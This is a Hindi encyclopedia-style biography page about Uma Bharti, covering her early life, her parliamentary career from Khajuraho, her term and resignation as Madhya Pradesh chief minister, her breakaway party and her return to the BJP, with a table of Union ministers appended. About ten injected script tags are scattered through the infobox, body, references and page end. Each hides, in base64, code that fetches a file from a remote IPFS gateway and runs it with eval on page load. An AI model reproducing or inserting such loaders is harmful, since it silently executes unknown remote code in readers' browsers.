उमा भारती
उमा भारती
| |
पूरा नाम | उमा भारती |
जन्म | 3 मई, 1959 |
जन्म भूमि | टीकमगढ़, मध्य प्रदेश |
नागरिकता | भारतीय |
प्रसिद्धि | राजनीतिज्ञ और समाज सेविका |
पार्टी | 'भारतीय जनता पार्टी', 'भारतीय जनशक्ति पार्टी' |
पद | भूतपूर्व कैबिनेट मंत्री (जल संसाधन, नदी विकास और गंगा कायाकल्प), भूतपूर्व मुख्यमंत्री (मध्य प्रदेश) |
कार्य काल | 26 मई, 2014 को मंत्री पद की शपथ ली |
भाषा | हिंदी |
विशेष योगदान | 'रामसेतु' को बचाने के लिए जुलाई, 2007 में उमा भारती ने 'सेतु समुद्रम प्रोजेक्ट' के विरोध में पाँच दिन की भूख हड़ताल की। |
अन्य जानकारी | हिन्दू धर्म तथा उससे संबंधित अच्छी जानकारी होने के कारण आपने अपने विचारों को किताबों में भी संग्रहित किया है। उनकी लिखी हुई अब तक तीन किताबें बाज़ार में आ चुकी हैं। |
अद्यतन | 18:06, 20 जून 2014 (IST) <script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script><script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>
|
उमा भारती (अंग्रेज़ी: Uma Bharti, जन्म- 3 मई, 1959, टीकमगढ़, मध्य प्रदेश) भारत की महिला राजनीतिज्ञों में से एक एवं जल संसाधन, नदी विकास और गंगा कायाकल्प मंत्रालय की भूतपूर्व केंद्रीय मंत्री थीं। सदैव भगवा वस्त्र में दिखाई देने वालीं उमा भारती का विवादों से भी नाता रहा है। सन 2003 में भारत की प्रमुख राजनीतिक पार्टियों में से एक 'भाजपा' (भारतीय जनता पार्टी) ने उन्हें मध्य प्रदेश के विधानसभा चुनावों में अपना अगुवा बनाया था। इस समय भाजपा ने 166 सीटों पर विजय प्राप्त की और 8 दिसम्बर, 2003 को उमा भारती मध्य प्रदेश की 22वीं मुख्यमंत्री बनीं। किंतु वे अधिक समय तक इस पद नहीं रह सकीं और नौ महीने बाद ही उन्हें त्यागपत्र देना पड़ा था। संघ परिवार से संबंधित उमा भारती बचपन से ही हिन्दू धार्मिक ग्रंथों और महाकाव्यों में रुचि लेने लग गई थीं, जिस कारण उनके स्वभाव और व्यक्तित्व में उनकी इस विशेषता की झलक साफ़ दिखाई देती है। उमा एक आत्म-विश्वासी और आत्म-निर्भर महिला हैं। साध्वी की भांति वेशभूषा धारण किए उमा भारती ने अविवाहित रहकर अपना जीवन धर्म के प्रचार-प्रसार में लगाने का व्रत लिया है।
जन्म तथा शिक्षा
उमा भारती का जन्म 3 मई, 1959 को मध्य प्रदेश के टीकमगढ़ ज़िले में हुआ था। लोधी राजपूत परिवार में जन्म लेने वाली उमा राजनीति में एक तेज-तर्रार महिला नेता के रूप में जानी जाती हैं। उमा भारती हिन्दू महाकाव्यों के विषय में काफ़ी अच्छी जानकारी रखती हैं। एक साध्वी के रूप में अपनी पहचान बना चुकी उमा का ग्वालियर की राजमाता विजयाराजे सिंधिया से घनिष्ठ सम्बन्ध रहा है। केवल छठी कक्षा तक शिक्षा प्राप्त उमा भारती धार्मिक विषयों में बहुत अधिक रुचि रखती हैं, जिसके कारण उनका संबंध देश के कई बड़े धार्मिक नेताओं से है। राजनीतिज्ञ और हिन्दू धर्म की प्रचारक होने के अलावा उमा भारती एक समाज सेवी भी हैं।
राजनीतिक शुरुआत
उमा ने अपनी राजनीतिक यात्रा ग्वालियर की राजमाता विजयाराजे सिंधिया के संरक्षण में प्रारम्भ की थी। अयोध्या में राम मंदिर आंदोलन के दौरान भारतीय जनता पार्टी ने उन्हें एक बड़े नेता के रूप में पेश किया। उमा भारती ने 1984 में अपना पहला संसदीय चुनाव खजुराहो से लड़ा। इसी समय इन्दिरा गाँधी की हत्या हुई और सारे देश में कांग्रेस के पक्ष में एक लहर बन चुकी थी। इसका परिणाम यह हुआ कि उमा को इस चुनाव में करारी शिकस्त का सामना करना पड़ा। लेकिन इन परिस्थितियों में भी उमा ने पार्टी की छवि को बनाये रखा और 1989 में वह खजुराहो सीट से विजयी हुईं। उमा भारती 1991, 1996 तथा 1998 के चुनावों में भी खजुराहो की संसदीय सीट पर लगातार विजय प्राप्त करती रहीं। उन्होंने 1999 का चुनाव भोपाल से लड़ा था।[१]
मुख्यमंत्री का पद
राजनीतिक नज़रिये से उमा भारती का क़द उस समय और भी बढ़ गया, जब अटल बिहारी वाजपेयी के मंत्रिमंडल में उन्हें राज्यमंत्री के रूप में मानव संसाधन मंत्रालय, पर्यटन मंत्रालय, युवा एवं खेल मामलों की मंत्री तथा कोयला मंत्री आदि के रूप में कार्य करने का अवसर मिला। सन 2003 के मध्य प्रदेश के विधानसभा चुनावों में भाजपा ने उमा भारती को अपना अगुआकार बनाया। इसमें मध्य प्रदेश की 231 सदस्यों की विधानसभा में भाजपा ने 166 सीटें जीतकर सदन में तीन चौथाई बहुमत प्राप्त किया। इस प्रकार उमा भारती मध्य प्रदेश की जनता के समक्ष 22वीं मुख्यमंत्री के रूप में 8 दिसंबर, 2003 को आईं।
त्यागपत्र
मुख्यमंत्री के पद पर उमा ज़्यादा समय तक नहीं रह सकीं। नौ माह तक मुख्यमंत्री रहने के बाद कर्नाटक में साम्प्रदायिकता फैलाने तथा दंगे भड़काने के आरोप में उमा भारती को 23 अगस्त, 2004 को अपने पद से त्यागपत्र देना पड़ा। भाजपा ने उमा की सलाह पर इनके विशेष सहयोगी बाबूलाल गौड़ को मध्य प्रदेश का अगला मुख्यमंत्री नियुक्त कर दिया। 29 नवम्बर, 2005 को भाजपा ने बाबूलाल गौड़ को भी मुख्यमंत्री पद से हटा दिया और शिवराज सिंह चौहान को राज्य की बागडोर सौंप दी।[१]
आरोपों से बरी
मुख्यमंत्री के पद से हटाए जाने के कुछ समय बाद ही उमा भारती अपने ऊपर लगे आरोपों से बरी हो गईं। इसके बाद उमा ने मुख्यमंत्री का पद फिर से प्राप्त करने के लिए प्रयास किए, किंतु वे सफल नहीं हो सकीं। भाजपा पार्टी में उस समय सबसे बड़ा हंगामा हुआ, जब उमा भारती ने भारतीय जनता पार्टी की एक बैठक के दौरान लालकृष्ण आडवाणी की उपस्थिति में मीडिया के समक्ष कुर्सी से खड़े होकर पार्टी के ख़िलाफ़ शब्द कहे।
अलग पार्टी का गठन
इस घटना के बाद उमा भारती को भाजपा से पहली बार निलंबित किया गया। कुछ समय बाद उमा भारती ने 'भारतीय जनशक्ति पार्टी' नाम से अपना एक अलग राजनीतिक संगठन खड़ा किया। उमा भारती को अपनी राजनीतिक हैसियत का अंदाज़ा तब लगना शुरु हुआ, जब मध्य प्रदेश में हुए कई विधानसभा व संसदीय उपचुनावों में उनकी पार्टी के उम्मीदवार को पराजय का सामना करना पड़ा। यहाँ तक कि वे अपनी बड़ा मलहेरा विधानसभा सीट से भी 'भाजश' पार्टी को नहीं जिता सकीं। 'विश्व हिन्दू परिषद' (विहिप) व 'राष्ट्रीय स्वयंसेवक संघ' (आरएसएस) के कई नेता, जो यह महसूस कर रहे थे कि उमा भारती के विद्रोही तेवर हिन्दू मतों को विभाजित कर सकते हैं, उन्होंने उमा भारती की भाजपा में वापसी की कोशिशें शुरु कीं। किंतु भाजपा हाईकमान ने उनकी वापसी को स्वीकार नहीं किया। इस प्रकार अप्रैल, 2007 में किए गए समझौते के यह प्रयास असफल हो गए।[१]
भाजपा में वापसी
यद्यपि उमा भारती की वापसी को लेकर प्रारम्भ से ही 'भारतीय जनता पार्टी' में विरोधाभास की स्थिति विद्यमान थी, किंतु जून, 2011 में उमा भारती को भाजपा में फिर से सम्मिलित कर लिया गया। इस प्रकार लगभग छ: साल के लंबे समयांतराल के बाद उमा भारती का भाजपा में आगमन हुआ।[२]
योगदान
- 'राम जन्म भूमि' को बचाने के प्रयास में उमा भारती ने कई प्रभावकारी कदम उठाए। उन्होंने पार्टी से निलंबन के बाद भोपाल से लेकर अयोध्या तक की कठिन पदयात्रा भी की थी।
- उमा ने साध्वी ऋतंभरा के साथ मिलकर अयोध्या मसले पर आंदोलन प्रारम्भ किया। इस आंदोलन के लिए उन्होंने एक सशक्त नारा भी दिया- "राम-लला हम आएंगे, मंदिर वहीं बनाएंगे"।
- रामसेतु को बचाने के लिए जुलाई, 2007 में उमा भारती ने 'सेतु समुद्रम प्रोजेक्ट' के विरोध में पाँच दिन की भूख हड़ताल की।[२]
लेखन कार्य
उमा भारती की लेखन कार्य में भी रुचि रही है। हिन्दू धर्म तथा उससे संबंधित अच्छी जानकारी होने के कारण ही उमा ने अपने विचारों को किताबों में भी संग्रहित किया है। उनकी लिखी हुई अब तक तीन किताबें बाज़ार में आ चुकी हैं। इन किताबों में से एक भारत के बाहर भी प्रकाशित। उनकी किताबों के नाम इस प्रकार हैं-
- स्वामी विवेकानंद - 1972
- पीस ऑफ़ माइंड - 1978, अफ़्रीका
- मानव एक भक्ति का नाता - 1983
|
|
|
|
|
<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script> <script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>
टीका टिप्पणी और संदर्भ
- ↑ १.० १.१ १.२ उमा भारती (हिन्दी)। । अभिगमन तिथि: 26 सितमबर, 2012।<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>
- ↑ २.० २.१ नेतृत्व की पहचान उमा भारती (हिन्दी)। । अभिगमन तिथि: 26 सितम्बर, 2012।<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>
बाहरी कड़ियाँ
संबंधित लेख
<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>
नरेन्द्र मोदी का कैबिनेट मंत्रिमण्डल
क्रमांक | मंत्री नाम | मंत्रालय |
---|
प्रधानमंत्री | ||
---|---|---|
नरेन्द्र मोदी | 1. कार्मिक, लोक शिकायत एवं पेंशन मंत्रालय 2. परमाणु ऊर्जा विभाग | |
कैबिनेट मंत्री | ||
1. | राजनाथ सिंह | रक्षा मंत्रालय |
2. | अमित शाह | 1. गृह मंत्रालय 2. सहकारिता मंत्रालय |
3. | नितिन जयराम गडकरी | सड़क परिवहन एवं राजमार्ग मंत्रालय |
4. | निर्मला सीतारमण | 1. वित्त मंत्रालय 2. कारपोरेट कार्य मंत्रालय |
5. | नरेन्द्र सिंह तोमर | कृषि एवं कृषक कल्याण मंत्रालय |
6. | सुब्रह्मण्यम जयशंकर | विदेश मंत्री |
7. | अर्जुन मुंडा | जनजातीय कार्य मंत्री |
8. | स्मृति जुबिन ईरानी | महिला एवं बाल विकास मंत्री |
9. | पीयूष गोयल | 1. कपड़ा मंत्रालय 2. वाणिज्य और उद्योग मंत्रालय |
10. | धर्मेन्द्र प्रधान | 1. शिक्षा मंत्रालय 2. कौशल विकास और उद्यमिता मंत्रालय |
11. | प्रह्लाद जोशी | 1. संसदीय मामलों के मंत्री 2. कोयला मंत्रालय |
12. | नारायण तातू राणे | सूक्ष्म, लघु एवं मध्यम उद्यम मंत्री |
13. | सर्बानन्द सोनोवाल | 1. बंदरगाह, नौवहन और जलमार्ग मंत्रालय 2. आयुष मंत्रालय |
14. | मुख़्तार अब्बास नक़वी | अल्पसंख्यक मंत्रालय |
15. | वीरेन्द्र कुमार खटीक | सामाजिक न्याय और अधिकारिता मंत्रालय |
16. | गिरिराज सिंह | 1. ग्रामीण विकास मंत्रालय 2. पंचायती राज मंत्रालय |
17. | ज्योतिरादित्य एम. सिंधिया | नागरिक उड्डयन मंत्रालय |
18. | रामचंद्र प्रसाद सिंह | इस्पात मंत्रालय |
19. | अश्विनी वैष्णव | 1. रेल मंत्रालय 2. संचार मंत्रालय |
20. | पशुपति कुमार पारस | खाद्य प्रसंस्करण उद्योग मंत्रालय |
21. | गजेंद्र सिंह शेखावत | जल शक्ति मंत्रालय |
22. | किरण रिजिजू | कानून और न्याय मंत्रालय |
23. | राजकुमार सिंह | 1. विद्युत मंत्रालय 2. नवीन और नवीकरणीय ऊर्जा मंत्रालय |
24. | हरदीप सिंह पुरी | 1. पेट्रोलियम एवं प्राकृतिक गैस मंत्रालय 2. आवास और शहरी मामलों के मंत्रालय |
25. | मनसुख मंडाविया | 1. स्वास्थ्य और परिवार कल्याण मंत्रालय 2. रासायनिक उर्वरक मंत्रालय |
26. | भूपेन्द्र यादव | 1. पर्यावरण, वन और जलवायु परिवर्तन मंत्रालय 2. श्रम और रोजगार मंत्रालय |
27. | महेंद्र नाथ पाण्डेय | भारी उद्योग मंत्रालय |
28. | पुरुषोत्तम रूपाला | मत्स्य पालन, पशुपालन और डेयरी मंत्रालय |
29. | जी. किशन रेड्डी | 1. संस्कृति मंत्रालय 2. पर्यटन मंत्रालय |
30. | अनुराग ठाकुर | 1.सूचना और प्रसारण मंत्रालय 2. युवा मामले और खेल मंत्रालय |
राज्य मंत्री (स्वतंत्र प्रभार) | ||
1. | राव इन्द्रजीत सिंह | 1. सांख्यिकी और कार्यक्रम कार्यान्वयन मंत्रालय के राज्य मंत्री (स्वतंत्र प्रभार) 2. योजना मंत्रालय |
2. | जितेन्द्र सिंह (भाजपा) | 1. विज्ञान और प्रौद्योगिकी मंत्रालय के राज्य मंत्री (स्वतंत्र प्रभार) 2. पृथ्वी विज्ञान मंत्रालय के राज्य मंत्री (स्वतंत्र प्रभार) |
राज्य मंत्री | ||
1. | श्रीपद येस्सो नायक | 1. बंदरगाह, जहाजरानी और जलमार्ग मंत्रालय में राज्य मंत्री 2. पर्यटन मंत्रालय में राज्य मंत्री |
2. | फग्गन सिंह कुलस्ते | 1. इस्पात मंत्रालय में राज्य मंत्री 2. ग्रामीण विकास मंत्रालय में राज्य मंत्री |
3. | प्रहलाद सिंह पटेल | 1. जल शक्ति मंत्रालय में राज्य मंत्री 2. खाद्य प्रसंस्करण उद्योग मंत्रालय में राज्य मंत्री |
4. | अश्विनी कुमार चौबे | 1. उपभोक्ता मामले, खाद्य और सार्वजनिक वितरण मंत्रालय में राज्य मंत्री 2. पर्यावरण, वन और जलवायु परिवर्तन मंत्रालय में राज्य मंत्री |
5. | अर्जुन राम मेघवाल | 1. संसदीय कार्य मंत्रालय में राज्य मंत्री 2. संस्कृति मंत्रालय में राज्य मंत्री |
6. | जनरल (सेवानिवृत्त) वी. के. सिंह | 1. सड़क परिवहन और राजमार्ग मंत्रालय में राज्य मंत्री 2. नागर विमानन मंत्रालय में राज्य मंत्री |
7. | कृष्ण पाल गुर्जर | 1. विद्युत मंत्रालय में राज्य मंत्री 2. भारी उद्योग मंत्रालय में राज्य मंत्री |
8. | रावसाहेब दानवे | 1. रेल मंत्रालय में राज्य मंत्री 2. कोयला मंत्रालय में राज्य मंत्री |
9. | रामदास अठावले | सामाजिक न्याय और अधिकारिता मंत्रालय में राज्य मंत्री |
10. | साध्वी निरंजन ज्योति | 1. उपभोक्ता मामले, खाद्य और सार्वजनिक वितरण मंत्रालय में राज्य मंत्री
2. ग्रामीण विकास मंत्रालय में राज्य मंत्री |
11. | डॉ. संजीव कुमार बालयान | पशुपालन, मत्स्य पालन और दुग्ध उत्पादन मंत्रालय में राज्य मंत्री |
12. | नित्यानंद राय | गृह मंत्रालय में राज्य मंत्री |
13. | पंकज चौधरी | वित्त मंत्रालय में राज्य मंत्री |
14. | अनुप्रिया सिंह पटेल | उद्योग एवं वाणिज्य मंत्रालय में राज्य मंत्री |
15. | एस. पी. सिंह बघेल | न्याय और कानून मंत्रालय में राज्य मंत्री |
16. | राजीव चंद्रशेखर | 1. कौशल विकास और उद्यमिता मंत्रालय में राज्य मंत्री 2. इलेक्ट्रॉनिक्स और सूचना प्रौद्योगिकी मंत्रालय में राज्य मंत्री |
17. | शोभा करंदलाजे | कृषि और किसान कल्याण मंत्रालय में राज्य मंत्री |
18. | भानु प्रताप सिंह वर्मा | लघु, मध्यम और सूक्ष्म उद्योग मंत्रालय में राज्य मंत्री |
19. | दर्शना जरदोश | 1. कपड़ा मंत्रालय में राज्य मंत्री
2. रेल मंत्रालय में राज्य मंत्री |
20. | वी. मुरलीधरन | 1. विदेश मंत्रालय में राज्य मंत्री 2. संसदीय कार्य मंत्रालय में राज्य मंत्री |
21. | मीनाक्षी लेखी | 1. विदेश मंत्रालय में राज्य मंत्री 2. संस्कृति मंत्रालय में राज्य मंत्री |
22. | सोम प्रकाश | वाणिज्य और उद्योग मंत्रालय में राज्य मंत्री |
23. | रेणुका सिंह सरुता | आदिवासी मंत्रालय में राज्य मंत्री |
24. | रामेश्वर तेली | 1. पेट्रोलियम और प्राकृतिक गैस मंत्रालय में राज्य मंत्री 2. श्रम और रोजगार मंत्रालय में राज्य मंत्री |
25. | कैलाश चौधरी | कृषि और किसान कल्याण मंत्रालय में राज्य मंत्री |
26. | अन्नपूर्णा देवी यादव | शिक्षा मंत्रालय में राज्य मंत्री |
27. | ए. नारायणस्वामी | सामाजिक न्याय मंत्रालय में राज्य मंत्री |
28. | कौशल किशोर | शहरी विकास एवं आवास मंत्रालय में राज्य मंत्री |
29. | अजय भट्ट | 1. रक्षा मंत्रालय में राज्य मंत्री 2. पर्यटन मंत्रालय में राज्य मंत्री |
30. | बी. एल. वर्मा | 1. उत्तर पूर्वी क्षेत्र के विकास मंत्रालय में राज्य मंत्री 2. सहकारिता मंत्रालय में राज्य मंत्री |
31. | अजय कुमार मिश्रा | गृह मंत्रालय में राज्य मंत्री |
32. | देवुसिंह चौहान | संचार मंत्रालय में राज्य मंत्री |
33. | भगवंत खुबा | 1. नवीन और नवीकरणीय ऊर्जा मंत्रालय में राज्य मंत्री 2. रसायन और उर्वरक मंत्रालय में राज्य मंत्री |
34. | कपिल पाटिल | पंचायती राज मंत्रालय में राज्य मंत्री |
35. | प्रतिमा भौमिक | सामाजिक न्याय और अधिकारिता मंत्रालय में राज्य मंत्री |
36. | सुभाष सरकार | शिक्षा मंत्रालय में राज्य मंत्री |
37. | डॉ. भागवत किशनराव कराड | वित्त मंत्रालय में राज्य मंत्री |
38. | राजकुमार रंजन सिंह | 1. विदेश मंत्रालय में राज्य मंत्री 2. शिक्षा मंत्रालय में राज्य मंत्री |
39. | डॉ. भारती प्रवीण पवार | स्वास्थ्य एवं परिवार कल्याण मंत्रालय में राज्य मंत्री |
40. | बिश्वेश्वर टुडू | 1. जनजातीय मामलों के मंत्रालय में राज्य मंत्री 2. जल शक्ति मंत्रालय में राज्य मंत्री |
41. | शांतनु ठाकुर | बंदरगाह, जहाजरानी और जलमार्ग मंत्रालय में राज्य मंत्री |
42. | डॉ. मुंजापारा महेंद्रभाई | 1. महिला एवं बाल विकास मंत्रालय में राज्य मंत्री 2. आयुष मंत्रालय में राज्य मंत्री |
43. | जॉन बारला | अल्पसंख्यक मंत्रालय में राज्य मंत्री |
44. | एल. मुरुगन | 1. मत्स्य पालन, पशुपालन और डेयरी मंत्रालय में राज्य मंत्री 2. सूचना एवं प्रसारण मंत्रालय में राज्य मंत्री |
45. | निसिथ प्रमाणिक | 1. गृह मंत्रालय में राज्य मंत्री 2. युवा मामले और खेल मंत्रालय में राज्य मंत्री |
वर्णमाला क्रमानुसार लेख खोज
<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>
<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script><script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>